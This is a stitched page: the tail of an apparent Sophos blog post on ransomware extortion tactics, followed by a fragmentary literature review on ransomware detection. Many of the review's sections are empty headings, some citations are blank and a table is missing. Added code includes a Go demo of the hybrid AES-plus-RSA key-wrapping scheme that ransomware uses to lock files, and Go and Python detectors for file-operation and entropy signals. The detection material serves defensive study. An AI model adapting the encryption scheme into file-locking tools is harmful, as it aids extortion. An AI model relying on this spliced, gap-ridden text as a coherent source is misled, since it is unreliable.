While many ransomware gangs are still using the pressure tactics we reported on in 2021, there appears to have been an escalation. It’s not certain whether this is driven by increasing numbers of victims opting not to pay ransoms, competition from other threat actors, ransomware groups feeling increasingly emboldened, or other factors. However, what is apparent is that all the tactics we discuss here are designed to intimidate targeted organizations and people linked to them.

Some ransomware groups will weaponize any legitimate resource to increase the pressure on their targets – whether that’s the news media, as we explored in our earlier article, law enforcement, or threats of civil legal action or reporting malfeasance to regulatory authorities. While it’s probably too early to say if this approach is effective (and, it’s also worth noting, the threat isn’t always carried out), the criminals’ objective is to generate pressure from multiple angles and sources.

The use of phone calls and swatting also indicates a willingness to move threats from the digital sphere into the real world. Swatting, in particular, is an extremely dangerous crime that has on some occasions resulted in injury and death, as well as significant psychological distress.

In the future, ransomware gangs appear likely to continue to devise and employ novel strategies to coerce their victims into paying, and to inflict reputational damage – and perhaps worse – if ransoms are not paid.

Sophos has several resources to help defenders protect against ransomware. You can find best practice guidance, an anti-ransomware toolkit, a link to our incident response services, and links to several of our ransomware-related reports here. Specific advice on configuring Sophos products to prevent ransomware is also available.

Sophos X-Ops

Read similar articles, what to expect when you’ve been hit with avaddon ransomware, what’s new in sophos edr 4.0, sophos xdr: driven by data, leave a reply cancel reply.

Your email address will not be published. Required fields are marked *

Save my name, email, and website in this browser for the next time I comment.

Earlier Decision on Detection of Ransomware Identification: A Comprehensive Systematic Literature Review


1. Introduction

  • Provides a detailed overview of how ransomware has developed over time, focusing on its mechanisms, types, and the vectors used for attacks.
  • Conducts a comprehensive review of current approaches to ransomware detection, emphasizing the techniques and methods used at the various stages of detection.
  • Highlights how ML is being employed to improve ransomware detection.
  • Identifies the gaps in current research and suggests potential areas for future investigations to enhance the cybersecurity field’s defense against ransomware attacks.

2. Papers Selection for Literature Review

2.1. Methodology

2.2. Search String

2.3. Data Sources

2.4. Screening Process

3. Background

3.1. Overview of Ransomware Attacks

3.2. Types of Ransomware

  • Encrypting Ransomware: This type is the most common and encrypts the victim’s files with a strong encryption algorithm, making them inaccessible without the decryption key. Notable examples include CryptoWall, WannaCry, and CryptoLocker. The victim can still see the files but cannot open them unless the ransom is paid to obtain the key.
  • Non-Encrypting Ransomware: Also known as locker ransomware, this type locks the victim out of the entire device rather than individual files. The data remain unharmed but inaccessible, and the victim must pay a ransom to regain access. Winlock is an example; CTB-Locker, sometimes listed in this category, in fact encrypted files and belongs with the encrypting type.
  • Scareware: Also known as fake antivirus, scareware tries to convince the victim that the device is infected by showing a false warning, then demands payment for the “full version” of the software that will supposedly remove the threat. It typically relies on social engineering rather than actually encrypting files or locking the device.
  • PC/Workstation ransomware: This type targets personal computers and workstations, exploiting vulnerabilities in Windows, macOS, or Linux systems. Examples include WannaCry, which spread between Windows systems using a network exploit (EternalBlue, against SMBv1).
  • Mobile ransomware: Targeting mobile devices, this type of ransomware affects smartphones and tablets, primarily through malicious apps or compromised websites. Android devices are more frequently targeted due to the ease of installing apps from third-party sources.
  • IoT ransomware: IoT devices, such as smart home gadgets and industrial sensors, are increasingly being targeted due to their poor security measures. Attacks on these devices can lead to significant disruptions, especially when they affect critical infrastructure.
  • Individual users: This group is often the easiest target due to less stringent security practices. Attackers exploit this by using deceptive emails or malicious websites to initiate ransomware infections.
  • Enterprises: Businesses are targeted for their valuable data and deeper financial resources. Attacks may involve sophisticated strategies to infiltrate network defenses and encrypt critical business data.
  • Government and critical infrastructure: Attacks on government systems and critical infrastructure aim to cause significant disruption, often impacting national security, healthcare, and essential services.
  • Online Services: Cloud services and online platforms, such as social media and banking services, are also targeted, with attackers aiming to encrypt or steal large amounts of data to demand higher ransoms.

3.3. Ransomware Attack Vectors

3.4. Evolution of Ransomware

3.5. Ransomware Encryption Techniques

  • Generate the key: a unique key is generated for symmetric encryption.
  • Encrypt the files: the victim’s files are encrypted with that single secret key. Ransomware targets the data the victim values most, such as documents, photos, and videos.
  • Protect the key: to stop the victim recovering it, the ransomware leaves no plaintext copy of the key on the host. The key is generated on, or transmitted to, the attacker’s server, or is encrypted under an attacker-controlled public key and held until payment is made.
  • Advanced Encryption Standard (AES): AES is the usual symmetric algorithm. With the 128-, 192-, or 256-bit keys used to encrypt victims’ files, recovering the key by brute force is infeasible; decryption without the key is only possible if the implementation leaks it (for example by leaving it in memory or on disk) or if a flaw in key generation makes it predictable [ 25 ].
  • Generate the keys: a public/private key pair is generated for asymmetric encryption.
  • Encrypt the files using the public key: the files are encrypted under the public key. Because public-key operations are slow and limited to small inputs, ransomware in practice encrypts each file with a fresh symmetric key and uses the public key only to wrap that key.
  • Protect the private key: the private key stays on the attacker’s servers and is released only after the victim pays.
  • Examples of asymmetric encryption algorithms: RSA is one example. It has two keys: the public key encrypts (the victim’s files, or the symmetric keys that protect them) and the private key, stored remotely on the attacker’s servers, decrypts [ 26 ]. Elliptic Curve Cryptography (ECC) is another. ECC provides security comparable to RSA with much shorter keys. Ransomware typically uses it through key agreement (for example ECDH) to derive a per-victim symmetric key rather than to encrypt files directly; as with RSA, only the holder of the private key can complete the recovery [ 27 ].
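The steps above describe symmetric and asymmetric encryption separately; in practice the two are combined. The Go program below is an added example, not code from the paper or from any ransomware family, of that hybrid construction applied to an in-memory byte string: a fresh AES-256-GCM key encrypts the data, RSA-OAEP under the attacker’s public key wraps that key, and the plaintext key is wiped. The key sizes, the sample document and the Blob layout are assumptions made for the demo; all primitives come from the Go standard library.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

// Blob is everything left on the victim side: ciphertext plus the data key
// wrapped under the attacker's public key. No plaintext copy of the data key
// survives, so the blob is useless without the matching private key.
type Blob struct {
	WrappedKey []byte // AES-256 key encrypted with RSA-OAEP
	Nonce      []byte // AES-GCM nonce
	Ciphertext []byte
}

// Encrypt is the hybrid scheme: a fresh random symmetric key encrypts the bulk
// data (fast, any size) and only that 32-byte key goes through RSA.
func Encrypt(pub *rsa.PublicKey, plaintext []byte) (*Blob, error) {
	key := make([]byte, 32)
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	ct := gcm.Seal(nil, nonce, plaintext, nil)
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
	if err != nil {
		return nil, err
	}
	for i := range key { // "protect the key": wipe the only plaintext copy
		key[i] = 0
	}
	return &Blob{WrappedKey: wrapped, Nonce: nonce, Ciphertext: ct}, nil
}

// Decrypt is what a paid-for decryptor does: unwrap, then decrypt and authenticate.
func Decrypt(priv *rsa.PrivateKey, b *Blob) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, b.WrappedKey, nil)
	if err != nil {
		return nil, err // OAEP padding check fails: not the matching private key
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, b.Nonce, b.Ciphertext, nil)
}

// DemoResult records the three outcomes the example demonstrates.
type DemoResult struct {
	RightKeyRecovers bool // attacker's private key: expected true
	WrongKeyRecovers bool // any other private key: expected false
	TamperedDecrypts bool // ciphertext with one flipped byte: expected false
}

// Demo runs the scheme on a constructed sample document with two fresh RSA-2048
// key pairs, one playing the attacker and one an unrelated party.
func Demo() (DemoResult, error) {
	var res DemoResult
	attacker, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return res, err
	}
	other, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return res, err
	}
	doc := []byte("Q3 ledger: constructed sample document")
	blob, err := Encrypt(&attacker.PublicKey, doc)
	if err != nil {
		return res, err
	}
	got, err := Decrypt(attacker, blob)
	res.RightKeyRecovers = err == nil && bytes.Equal(got, doc)
	_, err = Decrypt(other, blob)
	res.WrongKeyRecovers = err == nil
	tampered := &Blob{WrappedKey: blob.WrappedKey, Nonce: blob.Nonce, Ciphertext: append([]byte(nil), blob.Ciphertext...)}
	tampered.Ciphertext[0] ^= 1
	_, err = Decrypt(attacker, tampered)
	res.TamperedDecrypts = err == nil
	return res, nil
}

func main() {
	res, err := Demo()
	fmt.Printf("%+v err=%v\n", res, err)
}
```

Demo shows the three facts a responder should keep in mind. The wrapped key inside the blob is the only recovery handle the victim holds, so encrypted files (and any per-victim key material in the ransom note) must be preserved. A different private key fails at the unwrap step rather than producing garbage, so there is nothing to brute force. And the GCM tag rejects tampered ciphertext. Decryptors for a family become possible only when the attacker’s private key is seized or leaked, or when the implementation diverges from this pattern, for example by leaving the data key in memory or on disk or by using predictable random numbers.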

3.6. Signs of a Ransomware Attack

3.7. Challenges in Early Detection of Ransomware

3.8. The Role of Artificial Intelligence to Improve Ransomware Detection


  • Support vector machines: A reliable ML method for detecting and classifying ransomware. It can be trained on features such as network traffic, file behavior, and system calls to separate benign software from ransomware, and is most useful when the data are high-dimensional and not linearly separable [ ].
  • Decision trees: Simple classifiers that split the data into subsets by feature value to build a tree of decisions. They can be trained on features such as system calls, network traffic, and file modifications [ ].
  • Random forests: An ensemble of decision trees, each built from a random subset of the data and features, which reduces overfitting and improves performance. They handle high-dimensional data but are harder to interpret and more computationally demanding [ ].
  • k-nearest neighbors: A simple method that finds the k training points closest to the input and predicts the majority label among them. It is effective in many applications and is used mainly for classification and regression [ ].
  • Extreme Gradient Boosting (XGBoost): A powerful and popular gradient-boosting algorithm that combines decision trees with gradient boosting to build a more accurate model, and scales to large, complex datasets while extracting relevant features [ ].
  • Logistic regression: Used for binary classification, where the result is one of two outcomes. Training finds the parameters that maximize the likelihood of the training data, and regularization can be added to prevent overfitting. It is simple, interpretable, and usable with small datasets [ ].
  • Deep learning: Deep learning (DL) techniques are proposed to overcome the limitations of traditional ransomware detection methods, improving reliability, accuracy, and performance. They suit unstructured data that require little or no human feature engineering, because of their self-learning capabilities, and perform particularly well when ransomware samples are represented as text or image data, since DL models classify voice, text, and image inputs well. DL can be problematic for general-purpose applications, especially those with small datasets, because it needs a large quantity of training data. High processing requirements and difficulty adapting to real-world datasets are two further issues [ 46 ].
  • Artificial neural networks: Artificial neural networks are applied across a broad range of inputs, which makes them suitable for detecting many kinds and variants of ransomware, including variants represented as images or text. Because they can keep learning, neural networks are well placed to recognize zero-day attacks and adjust to new ransomware data. However, their black-box nature and their reliance on specialized hardware and on the training data make it harder for human analysts to follow what the model is doing and to spot anomalies [ 47 ].
  • Ransomware behavioral analysis: One study used ML as a defense mechanism against ransomware, analyzing seven ransomware and seven benign samples and distinguishing them with low false-negative and false-positive rates. The features extracted included the Dynamic Link Libraries (DLLs) each sample loads. A DLL is a Windows file holding code and procedures shared among applications, so the set of DLLs a program imports is a compact fingerprint of the capabilities it uses (for example, cryptographic or networking libraries). Early detection of an attack and alerting the user are the main features of the proposed system [ 48 ].
  • Anomaly detection in network traffic: In [ 49 ], AI algorithms and ML techniques detect anomalies by analyzing network traffic. Normal and abnormal features are labeled, and ML is used to recognize unusual network states. The system isolated harmful activity, enabling early detection and preventive measures.
  • Signature-based ransomware detection: ML models have been used in systems that aim to detect ransomware signatures. Because ransomware constantly changes its signatures to evade traditional detection, the models are continuously updated to identify new variants, allowing early detection and appropriate decision-making [ 19 ].

3.9. Preventive Measures and Best Practices

  • Employee education and awareness: Increasing individuals’ awareness of the dangers of ransomware and educating them on cybersecurity best practices, such as detecting suspicious messages and avoiding downloading files or programs from suspicious or unreliable links [ 13 ].
  • Strong password policies: Forcing users to choose strong, unique passwords and to use a password manager to hold them [ 50 ]. Current guidance such as NIST SP 800-63B favors length, uniqueness, and screening against breached-password lists over forced periodic changes; credentials should be rotated when compromise is suspected.
  • Multi-factor authentication (MFA): Requiring a second factor (an authenticator app, a hardware token, or a biometric such as face or voice recognition) in addition to the password, so that a stolen or brute-forced password alone does not grant access to sensitive data or files [ 51 ].
  • Regular backups: Back up sensitive data regularly, keep at least one copy offline or immutable, since ransomware deletes or encrypts any backup it can reach, and test restores, so that the damage is limited if attackers gain access to the original data [ 52 ].
  • Timely updates: Ensure that all programs and operating systems are updated to the latest version and enable automatic updates for security software once connected to the Internet [ 22 ].
  • Network segmentation and access control: Segment the network to isolate important data from other systems, and apply the principle of least privilege by granting users only the privileges their tasks require [ 53 ].

3.10. Regulatory and Legal Considerations

3.11. Future Trends in Ransomware

4. Comprehensive Analysis of Ransomware: Detection, Prevention, and Trends

4.1. Indicators of Potential Ransomware Incidence

  • Excessive File Operations: A noticeable rise in file access activities. For example, opening or attempting to open a large number of files in a short time frame. This may indicate an ongoing ransomware attack.
  • Altered Input/Output Behavior: A marked change in the structure or volume of the data being read and written, for example structured documents being replaced by high-entropy output.
  • High Volume of Write Operations: A large increase in write or overwrite operations on the system could suggest that files are being encrypted by ransomware.
  • Use of Encryption Functions: Calls to cryptographic Application Programming Interfaces (APIs) by a process that is not normally associated with encryption.
  • Rapid File Modification Requests: Frequent requests to read, modify, or delete files within a short period of time. These could be signs of ransomware attempting to encrypt or erase data.
  • Unusual Network Communications: Initiating communications with a command-and-control (C2) server. This is a common step for ransomware to receive instructions or transmit encryption keys.
  • Registry Key Modifications: Unexpected changes in the keys associated with system startup or file associations.
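Turning the file-system indicators above into detection logic, the Go program below is an added example (not from the paper) that runs over a constructed file-operation trace: it slides a time window over one process’s events, counts opens, writes and removals, and, to capture the altered input/output behavior, measures the Shannon entropy of write payloads, since encrypted output sits close to 8 bits per byte. The event fields, the threshold values and the sample trace are assumptions made for the demo.

```go
package main

import (
	"math"
	"math/rand"
)

// FileEvent is one file-system operation attributed to a process. The shape is
// constructed for this example (Sysmon, ETW or auditd carry the same fields);
// per process, events are assumed to arrive in time order.
type FileEvent struct {
	TS   float64 // seconds since trace start
	PID  int
	Op   string // open, read, write, create, delete, move, rename
	Path string
	Data []byte // payload of write events, nil otherwise
}

// shannonEntropy returns bits per byte in [0, 8]: ciphertext sits near 8,
// documents and source code well below, which is the "altered I/O" signal.
func shannonEntropy(b []byte) float64 {
	var counts [256]int
	for _, c := range b {
		counts[c]++
	}
	h := 0.0
	for _, n := range counts {
		if p := float64(n) / float64(len(b)); n > 0 {
			h -= p * math.Log2(p)
		}
	}
	return h
}

// Thresholds are per-window limits for the indicators. The demo values are
// assumed; tune them against a baseline of benign activity.
type Thresholds struct {
	Window              float64 // seconds
	Opens, Writes, Dels int
	MinEntropy          float64 // a write at or above this counts as ciphertext-like
}

// Indicators slides a window over one process's events and reports every
// indicator whose peak count inside a window exceeded its threshold.
func Indicators(events []FileEvent, pid int, th Thresholds) []string {
	var evs []FileEvent
	for _, e := range events {
		if e.PID == pid {
			evs = append(evs, e)
		}
	}
	peak := map[string]int{}
	for i := range evs {
		cnt := map[string]int{}
		for j := i; j < len(evs) && evs[j].TS-evs[i].TS <= th.Window; j++ {
			e := evs[j]
			cnt[e.Op]++
			if e.Op == "delete" || e.Op == "move" {
				cnt["removal"]++
			}
			if e.Op == "write" && shannonEntropy(e.Data) >= th.MinEntropy {
				cnt["hiwrite"]++
			}
		}
		for k, v := range cnt {
			if v > peak[k] {
				peak[k] = v
			}
		}
	}
	var flags []string
	add := func(cond bool, flag string) {
		if cond {
			flags = append(flags, flag)
		}
	}
	add(peak["open"] > th.Opens, "excessive_file_opens")
	add(peak["write"] > th.Writes, "high_write_volume")
	add(peak["removal"] > th.Dels, "rapid_file_removal")
	add(peak["hiwrite"] > 0 && 2*peak["hiwrite"] >= peak["write"], "ciphertext_like_writes")
	return flags
}

// sampleTrace is a constructed trace: PID 4242 opens three documents, writes a
// random-byte copy of each and deletes the original, all within 0.25 s, while
// PID 7 saves one text note several seconds later.
func sampleTrace() []FileEvent {
	r := rand.New(rand.NewSource(42))
	var tr []FileEvent
	t := 0.0
	for _, f := range []string{"docs/a.docx", "docs/b.xlsx", "docs/c.pdf"} {
		buf := make([]byte, 4096)
		r.Read(buf)
		for _, e := range []FileEvent{{0, 4242, "open", f, nil}, {0, 4242, "create", f + ".locked", nil},
			{0, 4242, "write", f + ".locked", buf}, {0, 4242, "delete", f, nil}} {
			t += 0.02
			e.TS = t
			tr = append(tr, e)
		}
	}
	return append(tr, FileEvent{5.0, 7, "open", "notes.txt", nil},
		FileEvent{5.1, 7, "write", "notes.txt", []byte("meeting notes: agree the budget\n")})
}
```

With a one-second window and demo thresholds of two opens, two writes and zero removals, PID 4242 raises all four flags and PID 7 raises none. The entropy check is what keeps a legitimate bulk operation (a build, a log rotation) from looking like encryption: it writes structured data, not ciphertext. Compressed or already-encrypted formats are the known false-positive source for that check, so production logic usually excludes them by extension or magic bytes.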

4.2. Ransomware Attack Framework

  • Target Identification: the initial phase involves selecting and identifying vulnerable systems or networks as potential targets for the attack.
  • Infection Vector Distribution: this step encompasses executing the ransomware through chosen delivery mechanisms—this could be by phishing emails, compromised websites, or malicious downloads.
  • Ransomware Installation: after successful entry into the system, the ransomware installs itself.
  • Encryption Key Generation and Retrieval: the ransomware then generates an encryption key locally, or retrieves one from its command-and-control server, to lock the victim’s files.
  • File Access: targeting the data that are valuable to the user.
  • Data Encryption: this phase encrypts the victim’s files, making them inaccessible without the decryption key.
  • Post-Encryption Operations: After encryption, the ransomware may perform additional actions, such as deleting backups and volume shadow copies so that the data cannot be restored without paying.
  • Ransom Demand: Finally, the attacker demands a ransom from the victim, often in a cryptocurrency.

4.3. Behavior Patterns of Ransomware Attacks

  • Type A Behavior: Ransomware directly encrypts the original files without creating copies. The steps include opening, reading, encrypting, and then closing the files. Sometimes, it may also rename the encrypted files to indicate they have been compromised.
  • Type B Behavior: Ransomware removes the original files from their location, creates encrypted copies, and then returns these encrypted versions to the original directory. The encrypted files might have different names from the originals, signifying their encrypted status.
  • Type C Behavior: Reading the original files and creating separate encrypted versions. The original files are deleted to eliminate any trace of the unencrypted data. The deletion is typically achieved through file movement operations that overwrite the originals.
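Detection logic for the file-operation signals in 4.1 and the three behaviour patterns in 4.3, as an added example that is not code from the paper: it replays a constructed per-process file-event stream (the event schema, the entropy and file-count thresholds, and all sample events are assumptions) and reports which original files a process handled in Type A, B or C fashion, plus whether the "excessive file operations" window tripped.

```python
# Added illustration for this section (not the paper's code): event schema,
# thresholds and all sample events below are constructed assumptions.
import math
import random
from collections import Counter
from dataclasses import dataclass

ENTROPY_THRESHOLD = 7.5   # bits/byte at or above which a write is treated as ciphertext
FILE_OPS_WINDOW_S = 10.0  # sliding window for the "excessive file operations" signal
FILE_OPS_THRESHOLD = 50   # distinct files touched in one window that trips the signal

@dataclass(frozen=True)
class FileEvent:
    ts: float          # seconds
    pid: int
    op: str            # open | read | write | close | rename | delete
    path: str
    dst: str = ""      # rename target
    data: bytes = b""  # payload of a write

def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the sample; uniformly random (hence encrypted) data approaches 8.0."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def classify_patterns(events: list[FileEvent]) -> dict[str, str]:
    """Map each pre-existing file touched by one process (events in time order) to
    Type A (encrypted in place), B (removed first, encrypted copy appears later) or
    C (encrypted copy appears first, original then deleted or overwritten by a move)."""
    created: set[str] = set()      # paths the process produced itself
    enc_paths: set[str] = set()    # paths currently holding high-entropy content
    first_seen, inplace, removed = {}, {}, {}
    enc_writes = []                # (index, path) of every high-entropy write or move
    for i, e in enumerate(events):
        if e.op in ("open", "read", "delete", "rename") and e.path not in created:
            first_seen.setdefault(e.path, i)   # pre-existing file: a candidate original
        if e.op == "write":
            if shannon_entropy(e.data) >= ENTROPY_THRESHOLD:
                enc_paths.add(e.path)
                enc_writes.append((i, e.path))
                if e.path in first_seen:
                    inplace.setdefault(e.path, i)
            created.add(e.path)
        elif e.op == "delete" and e.path in first_seen:
            removed.setdefault(e.path, i)
        elif e.op == "rename":
            created.add(e.dst)
            if e.path in enc_paths:            # ciphertext travels with the move
                enc_paths.add(e.dst)
                enc_writes.append((i, e.dst))
            if e.dst in first_seen:            # original overwritten by a move
                removed.setdefault(e.dst, i)
            if e.path in first_seen and e.dst.rpartition("/")[0] != e.path.rpartition("/")[0]:
                removed.setdefault(e.path, i)  # original moved out of its directory
    verdicts = {}
    for p, seen in first_seen.items():
        rem = removed.get(p)
        copy_idx = min((i for i, q in enc_writes if q != p and i > seen), default=None)
        if p in inplace and rem is None:
            verdicts[p] = "A"
        elif rem is not None and copy_idx is not None:
            verdicts[p] = "B" if rem < copy_idx else "C"
    return verdicts

def peak_files_touched(events: list[FileEvent], window: float = FILE_OPS_WINDOW_S) -> int:
    """4.1 'excessive file operations': most distinct paths touched inside any one window."""
    events = sorted(events, key=lambda e: e.ts)
    peak = start = 0
    for end, e in enumerate(events):
        while e.ts - events[start].ts > window:
            start += 1
        peak = max(peak, len({x.path for x in events[start:end + 1]}))
    return peak

PLAIN = b"quarterly report, line item " * 64       # constructed document-like content
CIPHER = random.Random(7).randbytes(2048)          # constructed stand-in for ciphertext
SAMPLE = {  # constructed per-process event streams
    101: [FileEvent(0.0, 101, "read", "/docs/a.xlsx"),                     # Type A: in place
          FileEvent(0.1, 101, "write", "/docs/a.xlsx", data=CIPHER),
          FileEvent(0.2, 101, "rename", "/docs/a.xlsx", dst="/docs/a.xlsx.locked")],
    202: [FileEvent(1.0, 202, "rename", "/docs/b.docx", dst="/tmp/b.docx"),  # Type B
          FileEvent(1.1, 202, "read", "/tmp/b.docx"),
          FileEvent(1.2, 202, "write", "/tmp/b.docx.enc", data=CIPHER),
          FileEvent(1.3, 202, "rename", "/tmp/b.docx.enc", dst="/docs/b.docx.enc"),
          FileEvent(1.4, 202, "delete", "/tmp/b.docx")],
    303: [FileEvent(2.0, 303, "read", "/docs/c.pdf"),                      # Type C: copy, delete
          FileEvent(2.1, 303, "write", "/docs/c.pdf.crypt", data=CIPHER),
          FileEvent(2.2, 303, "delete", "/docs/c.pdf")],
    404: [FileEvent(3.0, 404, "read", "/docs/notes.txt"),                  # benign editor save
          FileEvent(3.1, 404, "write", "/docs/notes.txt", data=PLAIN)],
    505: [FileEvent(4.0 + i * 0.02, 505, "open", f"/share/f{i}.doc") for i in range(60)],
}

if __name__ == "__main__":
    for pid, evs in SAMPLE.items():
        burst = peak_files_touched(evs) >= FILE_OPS_THRESHOLD
        print(pid, classify_patterns(evs), "excessive_file_ops" if burst else "")
```

The benign editor (pid 404) rewrites its file in place but with low-entropy content, so it gets no verdict; only the entropy check separates it from Type A.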

4.4. Comparison of Ransomware Detection Methods

4.5. Effectiveness of Current Ransomware Detection Approaches

4.6. Taxonomy of Ransomware Detection Techniques

  • Static Analysis: This involves checking the code of a suspicious file without running it [5]. The process includes examining the file structure, identifying any embedded strings (like text), and looking for known malicious patterns. To detect ransomware, some tools and studies focus on analyzing the parts of a file that do not change. However, as ransomware evolves, these static methods might not always work, especially with ransomware that hides its true nature [13].
  • Dynamic Analysis: The suspicious file is actually run in a controlled environment to observe what it does [5]. This might include looking at the file’s behavior, which files it tries to change [5], and how it interacts with the computer’s system. Various studies have used dynamic analysis to understand how ransomware behaves during an attack. This approach has been effective in detecting new types of ransomware but requires careful setup to avoid actual damage [13].
  • Hybrid Analysis: Combines static and dynamic methods for a more comprehensive examination by looking at both the file’s code and its behavior when executed. This approach aims to detect ransomware that might pass through with just one type of analysis. Hybrid analysis has shown promise in identifying ransomware early in the infection process. It benefits from the strengths of both static and dynamic analysis and therefore offers a stronger detection method.

4.7. Emerging Trends in Ransomware

4.8. Ransomware Avoidance Strategies

  • Keep software up to date: Regularly updating the operating system and all applications is crucial. These updates often include patches for security vulnerabilities that ransomware attackers exploit.
  • Unknown emails and downloads: Avoid opening emails or downloading attachments from unknown or suspicious sources. Cybercriminals often use phishing emails to spread ransomware.
  • Use browser security features: Enable security features in web browsers that can block malicious websites and downloads. Disabling JavaScript and Java on untrusted sites can also help prevent ransomware from being downloaded on your device.
  • Limit access to important files: Use features like “Controlled Folder Access” on Windows to prevent unauthorized applications from modifying protected folders. This step is particularly effective in stopping ransomware from encrypting your files.
  • Backup your data: Regularly back up your data and ensure that backups are stored in a secure location and disconnected from your main network. As a result, if you do fall victim to a ransomware attack, you can restore your data from the backup without paying the ransom.
  • Use security software: Employ antivirus and anti-ransomware software to detect and prevent ransomware threats. Keep this software up to date to protect against the latest ransomware variants.

5. Real-World Ransomware Incidents

  • WannaCry Global Ransomware Attack (2017): In May 2017, the WannaCry ransomware attack spread across over 150 countries and infected more than 250,000 computers [64]. The attack exploited a vulnerability in Microsoft Windows for which a patch had been released but not widely applied [64]. One of the victims of this attack was the UK’s National Health Service (NHS). The ransomware encrypted files and demanded Bitcoin payments to release the encrypted data [64]. The attack highlighted the importance of regular software updates and the strong impact of ransomware on critical infrastructure and services. It also marked a turning point in encouraging global awareness and efforts to combat cyber threats.
  • Colonial Pipeline Attack (2021): The Colonial Pipeline ransomware attack in May 2021 underscored the vulnerability of critical infrastructure to cyberattacks [65]. The Colonial Pipeline, which carries gasoline and jet fuel over 5500 miles (about 8850 km) between Texas and New York [65], was forced to shut down operations due to a ransomware attack by a group known as DarkSide [65]. This disruption led to a significant increase in gas prices, panic buying, and fuel shortages across the Eastern United States [65]. The company paid a ransom of nearly USD 5 million in cryptocurrency to regain access to their systems [65]. This incident encouraged the U.S. government to issue new cybersecurity directives for pipeline operators [65]; moreover, it emphasized the national security implications of ransomware attacks.
  • Atlanta City Government Attack (2018): In March 2018, the city government of Atlanta, Georgia, was hit by a ransomware attack [66]. This attack hit a large part of its digital infrastructure [66]. The SamSam ransomware attack affected multiple city services, which included court proceedings, bill payments, and law enforcement activities [66]. These affected services demonstrated how ransomware could damage the day-to-day operations of a city. The attackers demanded a ransom of USD 51,000 in Bitcoin, but the city chose not to pay [66]. The recovery and mitigation efforts cost the city an estimated USD 17 million [66]. This incident provided motivation to other cities across the United States to strengthen their cybersecurity defenses.
  • University of California, San Francisco (UCSF) Attack (2020): The University of California, San Francisco (UCSF), fell victim to a ransomware attack in June 2020. This attack targeted the School of Medicine’s IT infrastructure [67]. The university faced the potential loss of critical academic research data, including work related to COVID-19 [67]. UCSF chose to pay a ransom of over USD 1.14 million [67]. The NetWalker ransomware group was responsible for the attack [67]. They exploited vulnerabilities in unsecured networks [67]. This incident highlighted the complex ethical and financial decisions ransomware victims must make when critical scientific research is in danger.

6. Comparison with Other Review Papers

7. Related Study

| Reference | Key Findings | Limitations/Research Gaps | Suggested Mitigation |
| --- | --- | --- | --- |
| (table rows did not survive extraction) | | | |

8. Open Challenges and Limitations

9. Future Directions

9.1. Development of New Detection Algorithms

9.2. Integration of AI and ML

9.3. Impact of Emerging Technologies

9.4. Improved Data Collection and Sharing

9.5. Development of Resilient Backup Solutions

10. Conclusions

Author Contributions

Institutional Review Board Statement

Informed Consent Statement

Data Availability Statement

Acknowledgments

Conflicts of Interest

Abbreviations

SLR: Systematic Literature Review
SMB: Server Message Block
AES: Advanced Encryption Standard
ECC: Elliptic Curve Cryptography
DLLs: Dynamic Link Libraries
MFA: Multi-Factor Authentication
APIs: Application Programming Interfaces
DAM: Detection, Avoidance, and Mitigation
CNN: Convolutional Neural Networks
LSTM: Long Short-Term Memory
AI: Artificial Intelligence
NLP: Natural Language Processing
3LS: Three-Layer Security
ML: Machine Learning
BCS: Binary Cuckoo Search
MOGWO: Multi-Objective Grey Wolf Optimization
HSR: Highly Survivable Ransomware
TF-IDF: Term Frequency-Inverse Document Frequency
ANN: Artificial Neural Network
SVM: Support Vector Machine
PE: Portable Executable
SSF: Simplified Silhouette Filter
DL: Deep Learning
VM: Virtual Machine
CRF: Conditional Random Fields

References
[1] Ozer, M.; Varlioglu, S.; Gonen, B.; Bastug, M. A prevention and a traction system for ransomware attacks. In Proceedings of the 2019 International Conference on Computational Science and Computational Intelligence (CSCI), Las Vegas, NV, USA, 5–7 December 2019; pp. 150–154.
[2] Xia, T.; Sun, Y.; Zhu, S.; Rasheed, Z.; Shafique, K. Toward a network-assisted approach for effective ransomware detection. arXiv 2020, arXiv:2008.12428.
[3] Alqahtani, A.; Sheldon, F.T. A survey of crypto ransomware attack detection methodologies: An evolving outlook. Sensors 2022, 22, 1837.
[4] Beaman, C.; Barkworth, A.; Akande, T.D.; Hakak, S.; Khan, M.K. Ransomware: Recent advances, analysis, challenges and future research directions. Comput. Secur. 2021, 111, 102490.
[5] Razaulla, S.; Fachkha, C.; Markarian, C.; Gawanmeh, A.; Mansoor, W.; Fung, B.C.; Assi, C. The age of ransomware: A survey on the evolution, taxonomy, and research directions. IEEE Access 2023, 11, 40698–40723.
[6] The Latest Ransomware Statistics (Updated June 2024) | AAG IT Support. Available online: https://aag-it.com/the-latest-ransomware-statistics/ (accessed on 19 June 2024).
[7] Altulaihan, E.; Alismail, A.; Hafizur Rahman, M.; Ibrahim, A.A. Email Security Issues, Tools, and Techniques Used in Investigation. Sustainability 2023, 15, 10612.
[8] The PRISMA 2020 Statement: An Updated Guideline for Reporting Systematic Reviews. Available online: https://www.bmj.com/content/372/bmj.n71 (accessed on 19 June 2024).
[9] Alraizza, A.; Algarni, A. Ransomware detection using machine learning: A survey. Big Data Cogn. Comput. 2023, 7, 143.
[10] Ransomware Payments Exceed 1 Billion in 2023, Hitting Record High after 2022 Decline. Available online: https://databreaches.net/2024/02/09/ransomware-payments-exceed-1-billion-in-2023-hitting-record-high-after-2022-decline/ (accessed on 7 February 2024).
[11] Arslanian, M.; Roberts, H.; Welfer, J.; Xie, S.; Chen, B. The WannaCry Ransomware. Available online: https://verifythesource.org/posts/wannacry (accessed on 20 April 2024).
